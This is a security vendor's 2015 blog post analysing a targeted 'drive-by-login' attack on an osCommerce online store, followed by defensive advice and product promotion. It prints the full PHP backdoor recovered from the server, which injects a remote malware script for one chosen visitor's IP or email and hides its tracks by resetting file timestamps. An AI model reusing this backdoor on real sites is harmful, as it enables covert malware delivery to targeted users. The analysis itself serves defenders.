Stay in Touch

Application security insights and invitations to exclusive events in your inbox


Your data will stay confidential Private and Confidential

Drive-by-login attack: the end of safe web

Tuesday, April 7, 2015 By Read Time: 3 min.

In this blog post, we are going to share some interesting facts about a new vector of drive-by-download attack that we called ‘drive-by-login’.


Information security industry is familiar with drive-by-download attacks since a dozen of years already. According to Comodoa 'drive-by-download' attack is a malware delivery technique that is triggered simply because the user visited a website”. Updated software, installed antivirus and basic knowledge of computer security can prevent 95% of drive-by-download attacks today. Information security industry is evolving everyday, bringing new products and solutions aimed to stop known cyberattacks. Obviously, at the same time hackers are creating new attacking techniques and vectors that would be simple and efficient to use. In this blog post, we are going to share some interesting facts about a new vector of drive-by-download attack that we called ‘drive-by-login’.

login successful...
Login successful...

Three weeks ago, we had a customer, a medium-size online store from Central Europe, who contacted us after a very strange behavior of his website. One of his long-term clients, who was a respected and successful businessman, complained that the store’s website tried to infect his PC with a malware. Daily malware and vulnerability scans, however, did not reveal any threats since months. The shop was running the latest osCommerce Online Merchant v2.3.4 released in June 2014. Initially, we thought that it was a false-positive alert, however it was not.

We quickly discovered a very interesting file named ‘ozcommerz_pwner.php.bak’ in the document root. The file had the following content:

<?php

# osCommerce 2.x.x universal user pwner by Piht0z
# tested on osCommerce-2.3.4
# keep priv8 && fuck white hats 

$victim_ip "127.0.0.1";
$victim_email "user@mail.com";
$pack="http://host/bl.js";

$time filectime("includes/application_bottom.php");
if(isset(
$_GET['del'])) {
$str file_get_contents("includes/application_bottom.php");
$str preg_replace('/\<\?\s.*/ms','',$str);
file_put_contents("includes/application_bottom.php",$str);
} else {
file_put_contents("includes/application_bottom.php"'<?
$str = "<script src=\"'
.$pack.'\"></script>";
$ip = explode(".",$_SERVER["REMOTE_ADDR"]);
if($ip[0].".".$ip[1].".".$ip[2].".".$ip[3] == "'
.$victim_ip.'")
{ echo $str; }
if ( is_int($_SESSION["customer_id"]) && 
($_SESSION["customer_id"] > 0) ) {
$customer_info_query = tep_db_query("select customers_email_address from "
 . TABLE_CUSTOMERS . " where customers_id = \'" .
(int)$_SESSION["customer_id"] . "\'");
$customer_info = tep_db_fetch_array($customer_info_query);
if($customer_info["customers_email_address"] == "'
.$victim_email.'") {
echo $str;
}
}
?>'
FILE_APPEND);
}
touch("includes/application_bottom.php",$time);
?>

As we can see from the comments kindly left by hackers – it’s a universal osCommerce backdoor that delivers malware for selected user(s). Compared to drive-by-download technique that targets any user who opens the link, drive-by-login targets the very specific victim and nobody else.

The backdoor patches the ‘/includes/application_bottom.php’ osCommerce script with a malicious code that loads arbitrary remote content (malware) based on website visitor’s IP or on visitor’s profile email (for registered customers only). After modifying the script the backdoor will change the timestamp of ‘/includes/application_bottom.php’ file in order to keep last modification date of the script unchanged, as if nothing happened. If the backdoor is called with “?del” parameter - it will restore the original content of the ‘/includes/application_bottom.php’ script.

For the moment the backdoor is not known to virustotal.com:
https://www.virustotal.com/en/file/04bf6a4fa9230d95bc97738f088e4e3d249ca599a3d7b6c1 0bf5b6a20720bca8/analysis/1427841867/

Our customer’s ‘/includes/application_bottom.php’ script was apparently restored and had no malicious code inside. However, we managed to recover its older version from the backup that contained interesting modification:

Drive-by-login attack: the end of safe web
Backdoored version of "/includes/application_bottom.php"

As you can image – both the IP and email belonged to the businessman who launched the alert. The remote URL loaded a popular exploit pack that targeted recent 0day vulnerabilities in Flash.

Further investigation revealed that the osCommerce was compromised via a third-party plugin that contained a serious vulnerability (automated vulnerability scanners missed it).

The logs also revealed that after removing the backdoor the entire shop database was stolen – meaning that hackers initially targeted only the visitor, and took the database as a “bonus” at the end of the operation.

Some interesting conclusions from this case and about drive-by-login in general:

  • Drive-by-login attacks may partially or even entirely replace phishing in the near future, as more and more people become aware of phishing and cannot be tricked to click on a malicious link.
  • Drive-by-login attacks are extremely dangerous as they do not require any social engineering (as do phishing attacks) – it’s enough just to identify one of the victim’s favorite websites, compromise it and wait until the victim will visit the trusted website (quite probably without any precautions, e.g. with NoScript plugin disabled). This means that any security awareness performed by companies to explain the dangers of phishing will not help to prevent drive-by-login attacks.
  • Drive-by-login attacks are very difficult to detect by any malware scanners or scanning services as they deliver malware to the specific user only.
  • Website owners are not ready for drive-by-login attacks – many small and medium-size ecommerces think that they are too small to be compromised and don’t devote enough attention to web security. However, just one important visitor or client may be enough to become a victim of professional hackers.

High-Tech Bridge’s CEO, Mr. Ilia Kolochenko, comments:
We saw some similar cases of targeted attacks before, however it’s the first time we see a universal backdoor for a large e-commerce platform. This means that hackers started using this vector on a regular basis to achieve their goals. We can definitely say that drive-by-login attacks will grow in the future, putting every single website and thus every single user at risk.

The only way to prevent such attacks is to have sophisticated file-integrity monitor, to make sure that the web server is properly configured and patched, and to perform regular website penetration testing for your web application even if it’s CMS is up2date.


High-Tech Bridge’s Chief Research Officer, Mr. Marsel Nizamutdinov, says:
Drive-by-login attacks mean that no websites are safe anymore. Any website, regardless it’s size or purpose, may become a victim of targeted and sophisticated hack. Finally, this means that no websites can be considered secure or trusted anymore. This is the beginning of the end of safe web.

Our award-winning solution ImmuniWeb®, recently recognized as “most advanced hybrid on-demand web penetration testing SaaS” by Frost & Sullivan research, enables SMEs to hire professional penetration testers in few minutes and prevent the vast majority of web security risks that may turn a website into drive-by-login weapon in hands of virtual hitmans.


High-Tech Bridge Security Research Team regularly writes about web and mobile application security, privacy, Machine Learning and AI.

User Comments
Add Comment
1 responses to "Drive-by-login attack: the end of safe web"
Anonymous 2015-04-13 22:41:19 UTC Comment this
Do you know which osCommerce add-on contained the file?
↑ Back to Top

Quick Start
Technology
Products
Free Trial